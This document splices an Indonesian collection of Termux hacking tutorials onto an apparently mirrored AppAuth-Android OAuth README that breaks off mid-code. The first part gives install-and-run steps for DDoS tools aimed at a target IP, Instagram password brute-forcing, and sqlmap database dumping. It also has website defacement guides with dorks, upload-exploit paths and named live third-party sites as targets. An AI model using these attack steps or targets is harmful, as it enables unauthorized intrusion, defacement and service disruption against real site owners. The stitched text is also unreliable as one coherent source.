wifiphisher $ python wifiphisher Nih yang mau hack WiFi Khusus root $apt update $apt upgrade $apt install git $git clone https://github.com/esc0rtd3w/wifi-hacker $ls $cd Ni KUMPULAN TUTOR TERMUX [X SCREW UP X] *HACK INSTAGRAM* ( sosial engineering) $ apt update && apt upgrade $ pkg install python $ pkg install git $ pkg install nano $ git clone https://github.com/avramit/instahack.git $ ls $ cd instahack $ ls $ pip install requests $ cd instahack $ nano pass.txt $ cat pass.txt $ ls $ python hackinsta.py Localizar ip Apt install python git git clone https://github.com/maldevel/IPGeoLocation.git cd IPGeoLocation chmod +x ipgeoLocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t http://www.google.com Lacak IP git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IP yang ingin dilacak TOOL DDOS VIA TERMUX 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py RED_HAWK tool $ apt update $ apt install git $ git clone https://github.com/Tuhinshubhra/RED_HAWK $ cd RED_HAWK $ chmod +x rhawk.php $ apt install php $ ls $ php rhawk.php ```Install webdav ``` $ apt update && upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ ln -s /sdcard $ cd sdcard $ mkdir webdav $ cd webdav Tutorial Install *Tools-B4J1N64Nv5* pkg install update pkg install git pkg install toilet pkg install figlet pip2 install lolcat git clone https://github.com/DarknessCyberTeam/B4J1N64Nv5 cd B4J1N64Nv5 sh B4J1N64N.sh cara install termux ubuntu - apt update/pkg update - apt upgrade/pkg upgrade - pkg install git - pkg install proot - pkg install wget - git clone https://github.com/Neo-Oli/termux-ubuntu - cd termux-ubuntu - chmod +x ubuntu.sh - pip install -r requirements.txt - ./ubuntu.sh Untuk menjalankan - ./start.sh Cara install github tembak XL Dari awal 1.pkg upgrade 2.pkg update 3.pkg install git 4.pkg install python 5.git clone https://github.com/albertoanggi/xl-py 6.pip install -r requirements.txt 7.chmod +x app.py 8.python/python2 app.py *Install admin finder in termux* $ apt update && apt upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/AdheBolo/AdminFinder *Menjalankan* $ ls $ cd AdminFinder $ chmod 777 AdminFinder.py $ python2 AdminFinder.py *Cara install tool Mr.Rv1.1* $apt update && apt upgrade $pkg install git $pkg install gem $pkg install figlet $gem install lolcat $git clone https://github.com/Mr-R225/Mr.Rv1.1 $cd Mr.Rv1.1 $sh Mr.Rv1.1.sh tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools TOOL FSOCIETY $ git clone https://github.com/manisso/fsociety $ cd fsociety $ ./install.sh $ ls $ python2 fsociety.py SQLMAP apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap https://github.com/sqlmapproject/sqlmap.git cd sqlmap Python2 sqlmap.py Exemplo Python2 sqlmap.py -u website –dbs -D acuart –tables -D acuart -T users –columns -D acuart -T users -C name,email,phone -dump BUSCA PAINEL ADM DE SITE pkg install git git clone https://github.com/Techzindia/admin_penal cd admin_penal chmod +x admin_panel_finder.py python2 admin_panel_finder.py HAKKU apt install pytho apt install git mkdir vasu git clone https://github.com/4shadoww/hakkuframework cd hakkuframework chmod +x hakku python hakku show modules use whois show options set target examplesite.com run TOOL D-TECT apt update apt install git git clone https://github.com/shawarkhanethicalhacker/D-TECT cd D-TECT apt install python2 chmod +x d-tect.py python2 d-tect.py examplesite.com viSQL apt update apt install python2 apt install git git clone https://github.com/blackvkng/viSQL cd viSQL python2 -m pip install -r requirements.txt python2 viSQL.py python2 viSQL.py -t http://www.bible-history.com Hash Buster apt update apt upgrade apt install python2 apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster python2 hash.py tool ubuntu $ apt update $ apt install git $ apt install wget $ apt install proot $ git clone https://github.com/Neo-Oli/termux-ubu… $ cd termux-ubuntu $ chmod +x ubuntu.sh $ ./ubuntu.sh $ ./start.sh (````Install``` *Hunner framework*) $ apt update $ apt install python $ apt install git -y $ git clone https://github.com/b3-v3r/Hunner $ cd Hunner $ chmod 777 hunner.py $ python hunner.py *Cara Install Lazymux di Termux* $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Gameye98/Lazymux $ cd Lazymux $ chmod +x lazymux.py $ python2 lazymux.py Cara install tools daijobu* Fungsinya nanti liat sendiri lah di dalem tools nya $apt upgrade && apt update $apt install php $apt install git Kalo udah selesai langsung masukan git nya dengan perintah $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php Hecker RECONDOG apt update apt install python python2 apt install git git clone https://github.com/UltimateHackers/ReconDog cd ReconDog chmod +x dog.py Python2 dog.py DEFACE Hacking Script-Deface $apt update $apt upgrade $apt install git $apt install python2 $git clone https://github.com/Ubaii/script-deface-creator $ls $cd script-deface-creator $ls $chmod +x create.py $ls $python2 create.py done semoga bisa bikin script Html CARA DEFACE Cara1 Siapkan script sendiri.. 1.buka browser kalian apa saja terserah lalu ke google 2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search 3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut (sitefinity/usercontrols/dialog/documenteditordialog.aspx) tanpa buka tutup kurung! E http://sitetarget*org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx 4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian 5.klik yang di bawah nya tunggu sampai loading selesai 6.tambah link target tadi dengan (/files) contoh http://sitetarget*org/files/namascriptdefacekalian.html lalu klik search 7.selesai!! Cara2 Method/metode KCFinder Inurl:/kcfinder/browse.php Inurl:/Kcfinder/ Langsung saja upload file deface anda,lalu panggil dengan tambahan /file/namasckamu.html Contoh: https://basukiwater.com/kcfinder/browse.php jadi https://basukiwater.com/file/namasckamu.html cara3 Deface Onion.to File Upload Tutor ini sekarang lagi Ngtreend & Simple , tapi ingat ya bukan Deepweb melaikan Fake Deepweb hehehe... Mari kita Lanjut... Dork : - inurl:/upload site:.onion.to - intext:"Upload" site:.onion.to Live : https://tt3j2x4k5ycaa5zt.onion.to/upload.php Step By Step : 1. Dorking Dulu 2. Pilih Web Target 3. Pilih File yang mau di'upload 4. Tinggal klik Upload => Done 😆 Contoh Target : https://tt3j2x4k5ycaa5zt.onion.to/uploads/lopeyou.html https://danwin1210.me/uploads/lopeyou.html https://temp.xn--wda.fr/e719x8JgJ.html Mirror?! 😆 https://www.defacer.id/296011.html https://www.defacer.id/296024.html cara4 Metode com media Bahan : 1. Dork : - inurl:com_media site:com - inurl:com_media intext:"Upload" 2. Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 3. Upload'an : Format .txt 😁 Live Target : http://www.james-insurance.co.uk/ Step by Step : gunakan Live Targert dulu untuk Uji Coba 😁 1. Masukkan dork : inurl:com_media intext:"Upload" site:co.uk 2. Pilih salah satu Web 3. Masukkan Exploit http://www.james-insurance.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 4. Lalu Upload file dalam tempat upload ( format .txt ) Akses shell ? Tambahkan : /images/namafile.txt contoh : http://www.james-insurance.co.uk/images/fac.txt Nanti Jadi Gini Hasilnyaa.. Mudah Bukan?! Tinggal Upload ke Defacer.id 😁 cara5 [POC] Vulnerability Simplicity Of Upload #Step 1: Dork: “Powered By: © Simplicity oF Upload” #Step 2: Exploit: http://[situstargetkamu]/PATH/upload.php *Tergantung dengan target. #Step 3: llowed file: gif, jpg, png, txt, php, asp, cgi, zip, exe, mp3, etc (not allowed for html) #Step 4: Preview: http://[situstargetkamu]/upload/[Your File] #Step 5: Live Demo: http://www.railfaneurope.net/pix/upload.php http://www.formplas.com/upload/upload.php Nah, saya kira cukup segitu aja kok, karena mudah tuh tutorial nya. Al in one crip termux $ apt update && apt upgrade $ pkg install php figlet ruby python python2 $ pip2 install lolcat $ git clone https://github.com/Rusmana-ID/rus $ cd $ cd rus $ ls $ sh v2.sh Kontak wa 083879017166 Note: user name:Rusmana Pasword:X-One
mercerheather476 / Turbo Garbanzo [](https://search.maven.org/search?q=g:net.openid%20appauth) [](http://javadoc.io/doc/net.openid/appauth) [](https://github.com/openid/AppAuth-Android/actions/workflows/build.yml) [](https://codecov.io/github/openid/AppAuth-Android?branch=master) AppAuth for Android is a client SDK for communicating with [OAuth 2.0](https://tools.ietf.org/html/rfc6749) and [OpenID Connect](http://openid.net/specs/openid-connect-core-1_0.html) providers. It strives to directly map the requests and responses of those specifications, while following the idiomatic style of the implementation language. In addition to mapping the raw protocol flows, convenience methods are available to assist with common tasks like performing an action with fresh tokens. The library follows the best practices set out in [RFC 8252 - OAuth 2.0 for Native Apps](https://tools.ietf.org/html/rfc8252), including using [Custom Tabs](https://developer.chrome.com/multidevice/android/customtabs) for authorization requests. For this reason, `WebView` is explicitly *not* supported due to usability and security reasons. The library also supports the [PKCE](https://tools.ietf.org/html/rfc7636) extension to OAuth which was created to secure authorization codes in public clients when custom URI scheme redirects are used. The library is friendly to other extensions (standard or otherwise) with the ability to handle additional parameters in all protocol requests and responses. A talk providing an overview of using the library for enterprise single sign-on (produced by Google) can be found here: [Enterprise SSO with Chrome Custom Tabs](https://www.youtube.com/watch?v=DdQTXrk6YTk). ## Download AppAuth for Android is available on [MavenCentral](https://search.maven.org/search?q=g:net.openid%20appauth) ```groovy implementation 'net.openid:appauth:<version>' ``` ## Requirements AppAuth supports Android API 16 (Jellybean) and above. Browsers which provide a custom tabs implementation are preferred by the library, but not required. Both Custom URI Schemes (all supported versions of Android) and App Links (Android M / API 23+) can be used with the library. In general, AppAuth can work with any Authorization Server (AS) that supports native apps as documented in [RFC 8252](https://tools.ietf.org/html/rfc8252), either through custom URI scheme redirects, or App Links. AS's that assume all clients are web-based or require clients to maintain confidentiality of the client secrets may not work well. ## Demo app A demo app is contained within this repository. For instructions on how to build and configure this app, see the [demo app readme](https://github.com/openid/AppAuth-Android/blob/master/app/README.md). ## Conceptual overview AppAuth encapsulates the authorization state of the user in the [net.openid.appauth.AuthState](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthState.java) class, and communicates with an authorization server through the use of the [net.openid.appauth.AuthorizationService](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationService.java) class. AuthState is designed to be easily persistable as a JSON string, using the storage mechanism of your choice (e.g. [SharedPreferences](https://developer.android.com/training/basics/data-storage/shared-preferences.html), [sqlite](https://developer.android.com/training/basics/data-storage/databases.html), or even just [in a file](https://developer.android.com/training/basics/data-storage/files.html)). AppAuth provides data classes which are intended to model the OAuth2 specification as closely as possible; this provides the greatest flexibility in interacting with a wide variety of OAuth2 and OpenID Connect implementations. Authorizing the user occurs via the user's web browser, and the request is described using instances of [AuthorizationRequest](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationRequest.java). The request is dispatched using [performAuthorizationRequest()](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationService.java#L159) on an AuthorizationService instance, and the response (an [AuthorizationResponse](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationResponse.java) instance) will be dispatched to the activity of your choice, expressed via an Intent. Token requests, such as obtaining a new access token using a refresh token, follow a similar pattern: [TokenRequest](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/TokenRequest.java) instances are dispatched using [performTokenRequest()](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationService.java#L252) on an AuthorizationService instance, and a [TokenResponse](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/TokenResponse.java) instance is returned via a callback. Responses can be provided to the [update()](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthState.java#L367) methods on AuthState in order to track and persist changes to the authorization state. Once in an authorized state, the [performActionWithFreshTokens()](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthState.java#L449) method on AuthState can be used to automatically refresh access tokens as necessary before performing actions that require valid tokens. ## Implementing the authorization code flow It is recommended that native apps use the [authorization code](https://tools.ietf.org/html/rfc6749#section-1.3.1) flow with a public client to gain authorization to access user data. This has the primary advantage for native clients that the authorization flow, which must occur in a browser, only needs to be performed once. This flow is effectively composed of four stages: 1. Discovering or specifying the endpoints to interact with the provider. 2. Authorizing the user, via a browser, in order to obtain an authorization code. 3. Exchanging the authorization code with the authorization server, to obtain a refresh token and/or ID token. 4. Using access tokens derived from the refresh token to interact with a resource server for further access to user data. At each step of the process, an AuthState instance can (optionally) be updated with the result to help with tracking the state of the flow. ### Authorization service configuration First, AppAuth must be instructed how to interact with the authorization service. This can be done either by directly creating an [AuthorizationServiceConfiguration](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationServiceConfiguration.java#L102) instance, or by retrieving an OpenID Connect discovery document. Directly specifying an AuthorizationServiceConfiguration involves providing the URIs of the authorization endpoint and token endpoint, and optionally a dynamic client registration endpoint (see "Dynamic client registration" for more info): ```java AuthorizationServiceConfiguration serviceConfig = new AuthorizationServiceConfiguration( Uri.parse("https://idp.example.com/auth"), // authorization endpoint Uri.parse("https://idp.example.com/token")); // token endpoint ``` Where available, using an OpenID Connect discovery document is preferable: ```java AuthorizationServiceConfiguration.fetchFromIssuer( Uri.parse("https://idp.example.com"), new AuthorizationServiceConfiguration.RetrieveConfigurationCallback() { public void onFetchConfigurationCompleted( @Nullable AuthorizationServiceConfiguration serviceConfiguration, @Nullable AuthorizationException ex) { if (ex != null) { Log.e(TAG, "failed to fetch configuration"); return; } // use serviceConfiguration as needed } }); ``` This will attempt to download a discovery document from the standard location under this base URI, `https://idp.example.com/.well-known/openid-configuration`. If the discovery document for your IDP is in some other non-standard location, you can instead provide the full URI as follows: ```java AuthorizationServiceConfiguration.fetchFromUrl( Uri.parse("https://idp.example.com/exampletenant/openid-config"), new AuthorizationServiceConfiguration.RetrieveConfigurationCallback() { ... } }); ``` If desired, this configuration can be used to seed an AuthState instance, to persist the configuration easily: ```java AuthState authState = new AuthState(serviceConfig); ``` ### Obtaining an authorization code An authorization code can now be acquired by constructing an AuthorizationRequest, using its Builder. In AppAuth, the builders for each data class accept the mandatory parameters via the builder constructor: ```java AuthorizationRequest.Builder authRequestBuilder = new AuthorizationRequest.Builder( serviceConfig, // the authorization service configuration MY_CLIENT_ID, // the client ID, typically pre-registered and static ResponseTypeValues.CODE, // the response_type value: we want a code MY_REDIRECT_URI); // the redirect URI to which the auth response is sent ``` Other optional parameters, such as the OAuth2 [scope string](https://tools.ietf.org/html/rfc6749#section-3.3) or OpenID Connect [login hint](http://openid.net/specs/openid-connect-core-1_0.html#rfc.section.3.1.2.1) are specified through set methods on the builder: ```java AuthorizationRequest authRequest = authRequestBuilder .setScope("openid email profile https://idp.example.com/custom-scope") .setLoginHint("jdoe@user.example.com") .build(); ``` This request can then be dispatched using one of two approaches. a `startActivityForResult` call using an Intent returned from the `AuthorizationService`, or by calling `performAuthorizationRequest` and providing pending intent for completion and cancelation handling activities. The `startActivityForResult` approach is simpler to use but may require more processing of the result: ```java private void doAuthorization() { AuthorizationService authService = new AuthorizationService(this); Intent authIntent = authService.getAuthorizationRequestIntent(authRequest); startActivityForResult(authIntent, RC_AUTH); } @Override protected void onActivityResult(int requestCode, int resultCode, Intent data) { if (requestCode == RC_AUTH) { AuthorizationResponse resp = AuthorizationResponse.fromIntent(data); AuthorizationException ex = AuthorizationException.fromIntent(data); // ... process the response or exception ... } else { // ... } } ``` If instead you wish to directly transition to another activity on completion or cancelation, you can use `performAuthorizationRequest`: ```java AuthorizationService authService = new AuthorizationService(this); authService.performAuthorizationRequest( authRequest, PendingIntent.getActivity(this, 0, new Intent(this, MyAuthCompleteActivity.class), 0), PendingIntent.getActivity(this, 0, new Intent(this, MyAuthCanceledActivity.class), 0)); ``` The intents may be customized to carry any additional data or flags required for the correct handling of the authorization response. #### Capturing the authorization redirect Once the authorization flow is completed in the browser, the authorization service will redirect to a URI specified as part of the authorization request, providing the response via query parameters. In order for your app to capture this response, it must register with the Android OS as a handler for this redirect URI. We recommend using a custom scheme based redirect URI (i.e. those of form `my.scheme:/path`), as this is the most widely supported across all versions of Android. To avoid conflicts with other apps, it is recommended to configure a distinct scheme using "reverse domain name notation". This can either match your service web domain (in reverse) e.g. `com.example.service` or your package name `com.example.app` or be something completely new as long as it's distinct enough. Using the package name of your app is quite common but it's not always possible if it contains illegal characters for URI schemes (like underscores) or if you already have another handler for that scheme - so just use something else. When a custom scheme is used, AppAuth can be easily configured to capture all redirects using this custom scheme through a manifest placeholder: ```groovy android.defaultConfig.manifestPlaceholders = [ 'appAuthRedirectScheme': 'com.example.app' ] ``` Alternatively, the redirect URI can be directly configured by adding an intent-filter for AppAuth's RedirectUriReceiverActivity to your AndroidManifest.xml: ```xml <activity android:name="net.openid.appauth.RedirectUriReceiverActivity" tools:node="replace"> <intent-filter> <action android:name="android.intent.action.VIEW"/> <category android:name="android.intent.category.DEFAULT"/> <category android:name="android.intent.category.BROWSABLE"/> <data android:scheme="com.example.app"/> </intent-filter> </activity> ``` If an HTTPS redirect URI is required instead of a custom scheme, the same approach (modifying your AndroidManifest.xml) is used: ```xml <activity android:name="net.openid.appauth.RedirectUriReceiverActivity" tools:node="replace"> <intent-filter> <action android:name="android.intent.action.VIEW"/> <category android:name="android.intent.category.DEFAULT"/> <category android:name="android.intent.category.BROWSABLE"/> <data android:scheme="https" android:host="app.example.com" android:path="/oauth2redirect"/> </intent-filter> </activity> ``` HTTPS redirects can be secured by configuring the redirect URI as an [app link](https://developer.android.com/training/app-links/index.html) in Android M and above. We recommend that a fallback page be configured at the same address to forward authorization responses to your app via a custom scheme, for older Android devices. #### Handling the authorization response Upon completion of the authorization flow, the completion Intent provided to performAuthorizationRequest will be triggered. The authorization response is provided to this activity via Intent extra data, which can be extracted using the `fromIntent()` methods on AuthorizationResponse and AuthorizationException respectively: ```java public void onCreate(Bundle b) { AuthorizationResponse resp = AuthorizationResponse.fromIntent(getIntent()); AuthorizationException ex = AuthorizationException.fromIntent(getIntent()); if (resp != null) { // authorization completed } else { // authorization failed, check ex for more details } // ... } ``` The response can be provided to the AuthState instance for easy persistence and further processing: ``` authState.update(resp, ex); ``` If the full redirect URI is required in order to extract additional information that AppAuth does not provide, this is also provided to your activity: ```java public void onCreate(Bundle b) { // ... Uri redirectUri = getIntent().getData(); // ... } ``` ### Exchanging the authorization code Given a successful authorization response carrying an authorization code, a token request can be made to exchange the code for a refresh token: ```java authService.performTokenRequest( resp.createTokenExchangeRequest(), new AuthorizationService.TokenResponseCallback() { @Override public void onTokenRequestCompleted( TokenResponse resp, AuthorizationException ex) { if (resp != null) { // exchange succeeded } else { // authorization failed, check ex for more details } } }); ``` The token response can also be used to update an AuthState instance: ```java authState.update(resp, ex); ``` ### Using access tokens Finally, the retrieved access token can be used to interact with a resource server. This can be done directly, by extracting the access token from a token response. However, in most cases, it is simpler to use the `performActionWithFreshTokens` utility method provided by AuthState: ```java authState.performActionWithFreshTokens(service, new AuthStateAction() { @Override public void execute( String accessToken, String idToken, AuthorizationException ex) { if (ex != null) { // negotiation for fresh tokens failed, check ex for more details return; } // use the access token to do something ... } }); ``` This also updates the AuthState object with current access, id, and refresh tokens. If you are storing your AuthState in persistent storage, you should write the updated copy in the callback to this method. ### Ending current session Given you have a logged in session and you want to end it. In that case you need to get: - `AuthorizationServiceConfiguration` - valid Open Id Token that you should get after authentication - End of session URI that should be provided within you OpenId service config First you have to build EndSessionRequest ```java EndSessionRequest endSessionRequest = new EndSessionRequest.Builder(authorizationServiceConfiguration) .setIdTokenHint(idToken) .setPostLogoutRedirectUri(endSessionRedirectUri) .build(); ``` This request can then be dispatched using one of two approaches. a `startActivityForResult` call using an Intent returned from the `AuthorizationService`, or by calling `performEndSessionRequest` and providing pending intent for completion and cancelation handling activities. The startActivityForResult approach is simpler to use but may require more processing of the result: ```java private void endSession() { AuthorizationService authService = new AuthorizationService(this); Intent endSessionItent = authService.getEndSessionRequestIntent(endSessionRequest); startActivityForResult(endSessionItent, RC_END_SESSION); } @Override protected void onActivityResult(int requestCode, int resultCode, Intent data) { if (requestCode == RC_END_SESSION) { EndSessionResonse resp = EndSessionResonse.fromIntent(data); AuthorizationException ex = AuthorizationException.fromIntent(data); // ... process the response or exception ... } else { // ... } } ``` If instead you wish to directly transition to another activity on completion or cancelation, you can use `performEndSessionRequest`: ```java AuthorizationService authService = new AuthorizationService(this); authService.performEndSessionRequest( endSessionRequest, PendingIntent.getActivity(this, 0, new Intent(this, MyAuthCompleteActivity.class), 0), PendingIntent.getActivity(this, 0, new Intent(this, MyAuthCanceledActivity.class), 0)); ``` End session flow will also work involving browser mechanism that is described in authorization mechanism session. Handling response mechanism with transition to another activity should be as follows: ```java public void onCreate(Bundle b) { EndSessionResponse resp = EndSessionResponse.fromIntent(getIntent()); AuthorizationException ex = AuthorizationException.fromIntent(getIntent()); if (resp != null) { // authorization completed } else { // authorization failed, check ex for more details } // ... } ``` ### AuthState persistence Instances of `AuthState` keep track of the authorization and token requests and responses. This is the only object that you need to persist to retain the authorization state of the session. Typically, one would do this by storing the authorization state in SharedPreferences or some other persistent store private to the app: ```java @NonNull public AuthState readAuthState() { SharedPreferences authPrefs = getSharedPreferences("auth", MODE_PRIVATE); String stateJson = authPrefs.getString("stateJson", null); if (stateJson != null) { return AuthState.jsonDeserialize(stateJson); } else { return new AuthState(); } } public void writeAuthState(@NonNull AuthState state) { SharedPreferences authPrefs = getSharedPreferences("auth", MODE_PRIVATE); authPrefs.edit() .putString("stateJson", state.jsonSerializeString()) .apply(); } ``` The demo app has an [AuthStateManager](https://github.com/openid/AppAuth-Android/blob/master/app/java/net/openid/appauthdemo/AuthStateManager.java) type which demonstrates this in more detail. ## Advanced configuration AppAuth provides some advanced configuration options via [AppAuthConfiguration](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AppAuthConfiguration.java) instances, which can be provided to [AuthorizationService](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationService.java) during construction. ### Controlling which browser is used for authorization Some applications require explicit control over which browsers can be used for authorization - for example, to require that Chrome be used for second factor authentication to work, or require that some custom browser is used for authentication in an enterprise environment. Control over which browsers can be used can be achieved by defining a [BrowserMatcher](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/BrowserMatcher.java), and supplying this to the builder of AppAuthConfiguration. A BrowserMatcher is suppled with a [BrowserDescriptor](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/BrowserDescriptor.java) instance, and must decide whether this browser is permitted for the authorization flow. By default, [AnyBrowserMatcher](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/AnyBrowserMatcher.java) is used. For your convenience, utility classes to help define a browser matcher are provided, such as: - [Browsers](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/Browsers.java): contains a set of constants for the official package names and signatures of Chrome, Firefox and Samsung SBrowser. - [VersionedBrowserMatcher](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/VersionedBrowserMatcher.java): will match a browser if it has a matching package name and signature, and a version number within a defined [VersionRange](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/VersionRange.java). This class also provides some static instances for matching Chrome, Firefox and Samsung SBrowser. - [BrowserAllowList](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/BrowserAllowList.java): takes a list of BrowserMatcher instances, and will match a browser if any of these child BrowserMatcher instances signals a match. - [BrowserDenyList](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/browser/BrowserDenyList.java): the inverse of BrowserAllowList - takes a list of browser matcher instances, and will match a browser if it _does not_ match any of these child BrowserMatcher instances. For instance, in order to restrict the authorization flow to using Chrome or SBrowser as a custom tab: ```java AppAuthConfiguration appAuthConfig = new AppAuthConfiguration.Builder() .setBrowserMatcher(new BrowserAllowList( VersionedBrowserMatcher.CHROME_CUSTOM_TAB, VersionedBrowserMatcher.SAMSUNG_CUSTOM_TAB)) .build(); AuthorizationService authService = new AuthorizationService(context, appAuthConfig); ``` Or, to prevent the use of a buggy version of the custom tabs in Samsung SBrowser: ```java AppAuthConfiguration appAuthConfig = new AppAuthConfiguration.Builder() .setBrowserMatcher(new BrowserDenyList( new VersionedBrowserMatcher( Browsers.SBrowser.PACKAGE_NAME, Browsers.SBrowser.SIGNATURE_SET, true, // when this browser is used via a custom tab VersionRange.atMost("5.3") ))) .build(); AuthorizationService authService = new AuthorizationService(context, appAuthConfig); ``` ### Customizing the connection builder for HTTP requests It can be desirable to customize how HTTP connections are made when performing token requests, for instance to use [certificate pinning](https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning) or to add additional trusted certificate authorities for an enterprise environment. This can be achieved in AppAuth by providing a custom [ConnectionBuilder](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/connectivity/ConnectionBuilder.java) instance. For example, to custom the SSL socket factory used, one could do the following: ```java AppAuthConfiguration appAuthConfig = new AppAuthConfiguration.Builder() .setConnectionBuilder(new ConnectionBuilder() { public HttpURLConnection openConnect(Uri uri) throws IOException { URL url = new URL(uri.toString()); HttpURLConnection connection = (HttpURLConnection) url.openConnection(); if (connection instanceof HttpsUrlConnection) { HttpsURLConnection connection = (HttpsURLConnection) connection; connection.setSSLSocketFactory(MySocketFactory.getInstance()); } } }) .build(); ``` ### Issues with [ID Token](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/IdToken.java#L118) validation ID Token validation was introduced in `0.8.0` but not all authorization servers or configurations support it correctly. - For testing environments [setSkipIssuerHttpsCheck](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AppAuthConfiguration.java#L129) can be used to bypass the fact the issuer needs to be HTTPS. ```java AppAuthConfiguration appAuthConfig = new AppAuthConfiguration.Builder() .setSkipIssuerHttpsCheck(true) .build() ``` - For services that don't support nonce[s] resulting in **IdTokenException** `Nonce mismatch` just set nonce to `null` on the `AuthorizationRequest`. Please consider **raising an issue** with your Identity Provider and removing this once it is fixed. ```java AuthorizationRequest authRequest = authRequestBuilder .setNonce(null) .build(); ``` ## Dynamic client registration AppAuth supports the [OAuth2 dynamic client registration protocol](https://tools.ietf.org/html/rfc7591). In order to dynamically register a client, create a [RegistrationRequest](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/RegistrationRequest.java) and dispatch it using [performRegistrationRequest](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationService.java#L278) on your AuthorizationService instance. The registration endpoint can either be defined directly as part of your [AuthorizationServiceConfiguration](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/AuthorizationServiceConfiguration.java), or discovered from an OpenID Connect discovery document. ```java RegistrationRequest registrationRequest = new RegistrationRequest.Builder( serviceConfig, Arrays.asList(redirectUri)) .build(); ``` Requests are dispatched with the help of `AuthorizationService`. As this request is asynchronous the response is passed to a callback: ```java service.performRegistrationRequest( registrationRequest, new AuthorizationService.RegistrationResponseCallback() { @Override public void onRegistrationRequestCompleted( @Nullable RegistrationResponse resp, @Nullable AuthorizationException ex) { if (resp != null) { // registration succeeded, store the registration response AuthState state = new AuthState(resp); //proceed to authorization... } else { // registration failed, check ex for more details } } }); ``` ## Utilizing client secrets (DANGEROUS) We _strongly recommend_ you avoid using static client secrets in your native applications whenever possible. Client secrets derived via a dynamic client registration are safe to use, but static client secrets can be easily extracted from your apps and allow others to impersonate your app and steal user data. If client secrets must be used by the OAuth2 provider you are integrating with, we strongly recommend performing the code exchange step on your backend, where the client secret can be kept hidden. Having said this, in some cases using client secrets is unavoidable. In these cases, a [ClientAuthentication](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/ClientAuthentication.java) instance can be provided to AppAuth when performing a token request. This allows additional parameters (both HTTP headers and request body parameters) to be added to token requests. Two standard implementations of ClientAuthentication are provided: - [ClientSecretBasic](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/ClientSecretBasic.java): includes a client ID and client secret as an HTTP Basic Authorization header. - [ClientSecretPost](https://github.com/openid/AppAuth-Android/blob/master/library/java/net/openid/appauth/ClientSecretPost.java): includes a client ID and client secret as additional request parameters. So, in order to send a token request using HTTP basic authorization, one would write: ```java ClientAuthentication clientAuth = new ClientSecretBasic(MY_CLIENT_SECRET); TokenRequest req = ...; authService.performTokenRequest(req, clientAuth, callback); ``` This can also be done when using `performActionWithFreshTokens` on AuthState: ```java ClientAuthentication clientAuth = new ClientSecretPost(MY_CLIENT_SECRET); 